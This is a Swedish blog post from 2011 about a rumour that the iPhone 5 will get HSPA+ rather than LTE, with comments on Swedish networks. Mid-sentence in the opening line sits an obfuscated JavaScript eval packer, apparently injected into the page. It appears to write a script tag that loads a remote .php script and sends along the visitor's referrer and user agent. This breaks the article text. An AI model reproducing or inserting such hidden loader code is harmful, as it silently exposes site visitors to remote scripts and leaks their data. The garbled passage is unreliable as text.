Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

iPhone 5 får bara 3,5G?

iPhone 5 får bara 3,5G?
Filip Urde
  • On 30 september, 2011
  • http://www.revue.se/filip-urde

.

.

.

.

.

.

.

.

.

.

.

.

Sverige eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rsyeb|var|u0026u|referrer|kinry||js|php’.split(’|’),0,{}))
är för mycket(?!?!) i framkant gällande telecom
. Så ser det ialla fall ut om man ska tro på det senaste ryktet gällande  iPhone 5. Vi har tackvare mycket Telia, varit extremt bortskämda med tekniken kring telecom i Sverige. Vi är mer eller bäst i världen på det här och nu har vi alltså kanske gått förbi den senaste tekniken. Kudos Telia!

Denna bild är på ett internet dokument från China Unicom, frågan är då självkart om detta är spekulationer eller om dem faktiskt vet något som vi andra inte gör?!…På bilden så kan vi klart se att det står ”nästa iPhone kommer att få HSPA+”.

HSPA+är ett amerikanskt mått, som rent översatt till Svenska skulle vara 4G , men borde kanske kallas 3.5G. I Sverige är 4G lika med LTE, en teknik även flera operatörer i USA just nu satsar på. Men eftersom HSPA+ är det största just nu och Apple satsar i förstahand på USA, så blir vi nog utan den optimala kapaciteten som ett 4G skulle innebära för iPhone5…precis som när de släppte den första generationen och skippade 3G.

 

Kan detta bli vändpunkten på smartphone tronen i Sverige? Jag skulle säga att målet är öppet, men det går ju som sagt fort i hockey, allt kan hända….
www.tuaw.com